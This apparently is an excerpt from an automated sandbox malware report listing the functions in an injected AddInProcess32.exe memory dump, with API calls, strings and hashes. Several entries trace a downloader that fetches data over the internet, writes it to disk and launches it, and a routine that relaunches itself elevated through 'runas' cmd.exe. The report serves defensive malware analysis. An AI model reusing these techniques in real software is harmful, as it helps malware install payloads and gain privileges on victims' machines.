                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 9ed16ef9779c02d6e7f4fb2c8675fdadbdadcb388720d3868958c3f84562015f
                                                                                                            • Instruction ID: c7764d1188791cd03cf770f2f04546622c67af5315fd6fbd065365adde8131cf
                                                                                                            • Opcode Fuzzy Hash: 9ed16ef9779c02d6e7f4fb2c8675fdadbdadcb388720d3868958c3f84562015f
                                                                                                            • Instruction Fuzzy Hash: AF31D674D012189BCB21DF68DD88BCDBBB8BF08310F5041EAE41CA6290EB749F858F49
                                                                                                            Function 00407B48 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00407B5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                            • String ID:
                                                                                                            • API String ID: 2325560087-0
                                                                                                            • Opcode ID: b3cd3010069134bdc06a26e374721fbc531fc9ea41cd9c4665c6601caa254926
                                                                                                            • Instruction ID: 58ffa6e5a28285f7a82ae90fda48af03ad9a69f9ab68bac074e952613a0c915f
                                                                                                            • Opcode Fuzzy Hash: b3cd3010069134bdc06a26e374721fbc531fc9ea41cd9c4665c6601caa254926
                                                                                                            • Instruction Fuzzy Hash: DB516A71E08205ABEB28CF59D9817AEB7F0FB88350F24843AC401EB390D3B8A941CF55
                                                                                                            Function 0040F905 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f2ad18ca5c3d4d14ae8de392ef5d2c438218ed5be53967046802c2e44fbb3421
                                                                                                            • Instruction ID: eae7a6d73dca6622784a838d1c93183e6f7f5f6df23da42e9fec07ca66b2767c
                                                                                                            • Opcode Fuzzy Hash: f2ad18ca5c3d4d14ae8de392ef5d2c438218ed5be53967046802c2e44fbb3421
                                                                                                            • Instruction Fuzzy Hash: 8F31E872A00219BFDB30DFB9CC84EAB777DEB84314F144179F805A7280E6349E448B54
                                                                                                            Function 00407A11 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00007A1D,00407271), ref: 00407A16
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 44269f2e51ee6e50175b1f6b701cc95c6819a78785e7297dcbae5f3461c54587
                                                                                                            • Instruction ID: 745af6bd67f1f6922f24c1edbd32b4250088bcabdc2796110c06f40ed49b9581
                                                                                                            • Opcode Fuzzy Hash: 44269f2e51ee6e50175b1f6b701cc95c6819a78785e7297dcbae5f3461c54587
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Function 00402520 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 52memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00402534
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040253D
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 0040254A
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000026A), ref: 00402557
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040255A
                                                                                                            • wsprintfW.USER32 ref: 00402567
                                                                                                            • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000,00000000,00000000), ref: 00402587
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00402593
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040259C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004025A1
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004025A4
                                                                                                            • ExitProcess.KERNEL32 ref: 004025A8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocFree$ExecuteExitFileModuleNameShellwsprintf
                                                                                                            • String ID: /c "%s"$cmd.exe$runas
                                                                                                            • API String ID: 3385381366-213241364
                                                                                                            • Opcode ID: dd824fdd94ba376a0c3559ff4f8246cb293e2107b4e837f293defc75e496ff9b
                                                                                                            • Instruction ID: 441fa4a2bb8c3f1e8e22662644751f9d018fb7d5a55d2b99290a6bc814c1ff6f
                                                                                                            • Opcode Fuzzy Hash: dd824fdd94ba376a0c3559ff4f8246cb293e2107b4e837f293defc75e496ff9b
                                                                                                            • Instruction Fuzzy Hash: 7D014F71E803147BF61067E29D5EF9B7E6CFB48B91F104011F708A71D0C9B45D40CA69
                                                                                                            Function 00401860 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 157memoryprocessCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 004025B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 004025E1
                                                                                                              • Part of subcall function 004025B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004025FB
                                                                                                              • Part of subcall function 004025B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00402644
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0040265A
                                                                                                              • Part of subcall function 004025B0: HeapAlloc.KERNEL32(00000000), ref: 0040265D
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 004026AA
                                                                                                              • Part of subcall function 004025B0: RtlAllocateHeap.NTDLL(00000000), ref: 004026AD
                                                                                                              • Part of subcall function 004025B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004026D7
                                                                                                              • Part of subcall function 004025B0: RtlFreeHeap.NTDLL(00000000), ref: 004026DA
                                                                                                              • Part of subcall function 004025B0: InternetCloseHandle.WININET(?), ref: 004026E6
                                                                                                              • Part of subcall function 004025B0: InternetCloseHandle.WININET(?), ref: 004026F3
                                                                                                            • GetProcessHeap.KERNEL32(00000000,0000020A), ref: 004018A0
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004018A3
                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000023,00000000), ref: 004018B6
                                                                                                              • Part of subcall function 00406DD0: GetCurrentDirectoryW.KERNEL32(00000103,00000244,?,?,?,00000000,000000FF), ref: 00406E5D
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 00401989
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040198C
                                                                                                            • PathCombineW.SHLWAPI(00000000,?,?), ref: 004019AA
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,00000000,00000000), ref: 00401A1A
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00401A2A
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00401A36
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00401A45
                                                                                                            • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 00401A48
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Internet$CloseHandle$Alloc$FreeOpenPath$AllocateCombineCreateCurrentDirectoryFileFolderReadSpecial
                                                                                                            • String ID: D$Pst^t
                                                                                                            • API String ID: 2613224297-4293525912
                                                                                                            • Opcode ID: f45c2ff5cb1f318ad88f7d26c71e491d3b541212b48ab92155e39b477564583e
                                                                                                            • Instruction ID: fd4bbc4ba79f2eb052b05b6cd251ed72691743f5e14ceb61becbe3eb516d8304
                                                                                                            • Opcode Fuzzy Hash: f45c2ff5cb1f318ad88f7d26c71e491d3b541212b48ab92155e39b477564583e
                                                                                                            • Instruction Fuzzy Hash: 1751B371A012189BDB20AF60CC59BAA7778FF44700F1041BAF54ABB2E0DB789D40CF59
                                                                                                            Function 00408CBB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00408DDA
                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00408EE8
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0040903A
                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00409055
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                            • String ID: csm$csm$csm
                                                                                                            • API String ID: 2751267872-393685449
                                                                                                            • Opcode ID: 8e68faa92370a965529a53a4b1aa1c85c9262d97b1e5eff1d9fa127d797ae8c1
                                                                                                            • Instruction ID: 7b7edcd1b472d616056aaf9ca5440520e9f3ce2695b85cf96550e61ac8a8a294
                                                                                                            • Opcode Fuzzy Hash: 8e68faa92370a965529a53a4b1aa1c85c9262d97b1e5eff1d9fa127d797ae8c1
                                                                                                            • Instruction Fuzzy Hash: 24B18C71900209DFCF15DFA5CA809AEBBB5BF24314B14416FE8847B292DB38DE51CB99
                                                                                                            Function 00408540 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00408577
                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040857F
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00408608
                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00408633
                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00408688
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                            • String ID: Fx@$csm
                                                                                                            • API String ID: 1170836740-2757198800
                                                                                                            • Opcode ID: d5ac8604d01ac333208a0c338073ae2a7e5e8417fecfc79e808da464ea9234f0
                                                                                                            • Instruction ID: 4b04f8770cba5fb961b9531c7f3f38ae8059c37cde7f09dcab7eeb7c3de7790a
                                                                                                            • Opcode Fuzzy Hash: d5ac8604d01ac333208a0c338073ae2a7e5e8417fecfc79e808da464ea9234f0
                                                                                                            • Instruction Fuzzy Hash: F441B434A00208ABCF10DF69CD80A9F7BB5AF45318F14856EE8547B3D2DB399E05CB99
                                                                                                            Function 0040E03E Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3213747228-0
                                                                                                            • Opcode ID: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
                                                                                                            • Instruction ID: a4d7e44a4c022d8882bf4dd48d55e7a8210e846d2bdd9f8f1f0772ce1768a2f9
                                                                                                            • Opcode Fuzzy Hash: bae61aaf466f51dc2cfca6d4b3cb37822215d39356c954e04fc30a487091a812
                                                                                                            • Instruction Fuzzy Hash: EBB14772A002559FDB118F66CC81BAF7BA5EF55310F1845BBE900BB3C2D6789911C7A8
                                                                                                            Function 004111E3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,004112F2,A2C859C2,0000044C,00000000,00000000,?,?,0041144C,00000022,FlsSetValue,0041B244,0041B24C,00000000), ref: 004112A4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                            • API String ID: 3664257935-537541572
                                                                                                            • Opcode ID: 13a807f08e4b2fbc4e7545eb37dd9819c29e6cd604fa78f32b9a5c44f0425b79
                                                                                                            • Instruction ID: c0ad62dc533ac1c9702fca9f15d615497be0f29348a61bc39096ef7b92af5ca6
                                                                                                            • Opcode Fuzzy Hash: 13a807f08e4b2fbc4e7545eb37dd9819c29e6cd604fa78f32b9a5c44f0425b79
                                                                                                            • Instruction Fuzzy Hash: 77213571A00111ABDB219B64EC41ADB3768DF11760B2441B2EE01F33E0E738EE41C6E8
                                                                                                            Function 0040D007 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A2C859C2,?,?,00000000,0041861B,000000FF,?,0040CFE3,0040D0C7,?,0040CFB7,00000000), ref: 0040D03C
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040D04E
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,0041861B,000000FF,?,0040CFE3,0040D0C7,?,0040CFB7,00000000), ref: 0040D070
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$Fx@$mscoree.dll
                                                                                                            • API String ID: 4061214504-3622240814
                                                                                                            • Opcode ID: 1dd3a9f09780d5505d8a5deabc52c5b76dbfc48eb79c1825561cdbebbcdc7d9a
                                                                                                            • Instruction ID: 1e0bd15e481942e97fccbb05080ab9fff33d04de5ccb01f5a471313bdd3020fe
                                                                                                            • Opcode Fuzzy Hash: 1dd3a9f09780d5505d8a5deabc52c5b76dbfc48eb79c1825561cdbebbcdc7d9a
                                                                                                            • Instruction Fuzzy Hash: 4701A771D44615BBDB118F90DC09FEE77B8FB44B14F004536E811A26D0DB789D41CA94
                                                                                                            Function 00408984 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,0040897B,004084E3,00407A61), ref: 00408992
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004089A0
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004089B9
                                                                                                            • SetLastError.KERNEL32(00000000,0040897B,004084E3,00407A61), ref: 00408A0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 8132ab8049597a0f0152600f2776cfcb933c90011c11b07c1ff3681c1354b7b8
                                                                                                            • Instruction ID: 43b54b935d4b9e744eb9404515c8c9fd3ba714462d7fc6ace75c42498f54b02a
                                                                                                            • Opcode Fuzzy Hash: 8132ab8049597a0f0152600f2776cfcb933c90011c11b07c1ff3681c1354b7b8
                                                                                                            • Instruction Fuzzy Hash: C901F172718321AEE62426B57E86A372B98FB01778320023FF250711E2EE7A5C02964D
                                                                                                            Function 00408A64 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustPointer
                                                                                                            • String ID: Fx@
                                                                                                            • API String ID: 1740715915-443324942
                                                                                                            • Opcode ID: f356ca3b56f828ee56c995e93dcfd931e3dc3b5137f2536b59d7325e1164e694
                                                                                                            • Instruction ID: 1a91d038004f6b70e2135f66d810801dd4f272973a1585a6dedaf1d3ec640edd
                                                                                                            • Opcode Fuzzy Hash: f356ca3b56f828ee56c995e93dcfd931e3dc3b5137f2536b59d7325e1164e694
                                                                                                            • Instruction Fuzzy Hash: C351C1B26057069FDB288F11DA41B6B77B4EF50310F14403FE982672D2DB39AD41CB99
                                                                                                            Function 004145D0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __alloca_probe_16.LIBCMT ref: 00414655
                                                                                                            • __alloca_probe_16.LIBCMT ref: 0041471E
                                                                                                            • __freea.LIBCMT ref: 00414785
                                                                                                              • Part of subcall function 0040DC7F: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,0040718C,00000000,?,00406E07,0000044C,A2C859C2,7591F380,00000000,00000000,000000FF,?,004014D5), ref: 0040DCB1
                                                                                                            • __freea.LIBCMT ref: 00414798
                                                                                                            • __freea.LIBCMT ref: 004147A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1423051803-0
                                                                                                            • Opcode ID: 1a80283c2e70fa09d16cf5d20edefe239e97a8433d9138ed18d4ed888f15a10c
                                                                                                            • Instruction ID: f3167d8e0243dde5af78ebf6985aeb94451484d05d6fe71b4df8962cd1e256b5
                                                                                                            • Opcode Fuzzy Hash: 1a80283c2e70fa09d16cf5d20edefe239e97a8433d9138ed18d4ed888f15a10c
                                                                                                            • Instruction Fuzzy Hash: 2151D872600206AFDB105FA1CC81EFB77A9EFC5714B29012EFD18D6290EB7CCC918668
                                                                                                            Function 00409AA2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00409A53,00000000,?,00422CE0,?,?,?,00409BF6,00000004,InitializeCriticalSectionEx,00419D38,InitializeCriticalSectionEx), ref: 00409AAF
                                                                                                            • GetLastError.KERNEL32(?,00409A53,00000000,?,00422CE0,?,?,?,00409BF6,00000004,InitializeCriticalSectionEx,00419D38,InitializeCriticalSectionEx,00000000,?,004099AD), ref: 00409AB9
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00409AE1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID: api-ms-
                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                            • Opcode ID: 887137ae3bc163b28a7465307e1ce3841d78868984676ccdf104f65e9dca045b
                                                                                                            • Instruction ID: a9cb1dfa298960d4fc1fe79fea012a7061f96a57943c0fde9da82d5a9a66ae8d
                                                                                                            • Opcode Fuzzy Hash: 887137ae3bc163b28a7465307e1ce3841d78868984676ccdf104f65e9dca045b
                                                                                                            • Instruction Fuzzy Hash: 81E01230B80205B7EF101BB1DC0AB5B3E549B01B50F108031F90CB41E2D775DC51999C
                                                                                                            Function 00414A9D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetConsoleOutputCP.KERNEL32(A2C859C2,00000000,00000000,?), ref: 00414B00
                                                                                                              • Part of subcall function 00410654: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0041477B,?,00000000,-00000008), ref: 004106B5
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00414D52
                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00414D98
                                                                                                            • GetLastError.KERNEL32 ref: 00414E3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 2112829910-0
                                                                                                            • Opcode ID: 60c5f054869722d532b1ea41e6caa76b28aab3d5ffe9f6e32e54c6c4c81700e4
                                                                                                            • Instruction ID: 9bc72cc52f421f30e8f6abcc0f4d52d0e1568dee037a441d4163aa1fce023b62
                                                                                                            • Opcode Fuzzy Hash: 60c5f054869722d532b1ea41e6caa76b28aab3d5ffe9f6e32e54c6c4c81700e4
                                                                                                            • Instruction Fuzzy Hash: ECD1BF75E042489FCF15CFA8D980AEDBBB5FF49304F28452AE816EB351D734A982CB54
                                                                                                            Function 004024B0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 004024CC
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004024D3
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 004024F3
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00402502
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 215268677-0
                                                                                                            • Opcode ID: 7b3405532f9736eb91037f93771a703fff670887a10e780259bd6e5a192c338a
                                                                                                            • Instruction ID: 198d9e17ccfe2a7ad384e8d2e913a2c16111d73c4ba0bcf3ee50cad862497ac3
                                                                                                            • Opcode Fuzzy Hash: 7b3405532f9736eb91037f93771a703fff670887a10e780259bd6e5a192c338a
                                                                                                            • Instruction Fuzzy Hash: 8201CD71A0021CABDB10DFA4DD59AAEBBB8FF08705F414569EA11E7190DB709E04CB98
                                                                                                            Function 004171B6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00416320,00000000,00000001,?,?,?,00414E8F,?,00000000,00000000), ref: 004171CD
                                                                                                            • GetLastError.KERNEL32(?,00416320,00000000,00000001,?,?,?,00414E8F,?,00000000,00000000,?,?,?,00415432,00000000), ref: 004171D9
                                                                                                              • Part of subcall function 0041719F: CloseHandle.KERNEL32(FFFFFFFE,004171E9,?,00416320,00000000,00000001,?,?,?,00414E8F,?,00000000,00000000,?,?), ref: 004171AF
                                                                                                            • ___initconout.LIBCMT ref: 004171E9
                                                                                                              • Part of subcall function 00417161: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00417190,0041630D,?,?,00414E8F,?,00000000,00000000,?), ref: 00417174
                                                                                                            • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00416320,00000000,00000001,?,?,?,00414E8F,?,00000000,00000000,?), ref: 004171FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                            • String ID:
                                                                                                            • API String ID: 2744216297-0
                                                                                                            • Opcode ID: 3d0c5046cf9d2e0f6704021f6f3b3043e657957f714e9acfb99967feb644a5d5
                                                                                                            • Instruction ID: b0767d8cb09f9060a6b35dd9a6a9e5853ba024826434936985c186be5aa50d1e
                                                                                                            • Opcode Fuzzy Hash: 3d0c5046cf9d2e0f6704021f6f3b3043e657957f714e9acfb99967feb644a5d5
                                                                                                            • Instruction Fuzzy Hash: 21F0AC36505114BBCF226F95EC04ADA3F76FF093A1F558165FA1895230CA72CC61DB98
                                                                                                            Function 0040C7EF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_AddInProcess32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$h-B
                                                                                                            • API String ID: 0-3472261264
                                                                                                            • Opcode ID: c595d2888e0eb11efb4b34618ed25aba47e01962a251bf0eaadfb82c9e146fa7
                                                                                                            • Instruction ID: fa767d83c2e4f49978a6e0558d888f3b8fd6f7704c6049fb9866f05cc0fb7e2c
                                                                                                            • Opcode Fuzzy Hash: c595d2888e0eb11efb4b34618ed25aba47e01962a251bf0eaadfb82c9e146fa7
                                                                                                            • Instruction Fuzzy Hash: A531A572E04214EFDB21EF9598C199FBBB8EB48354B50417BF805B7281DA788E05CB9C
                                                                                                            Function 00409060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 00409085
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2879994895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
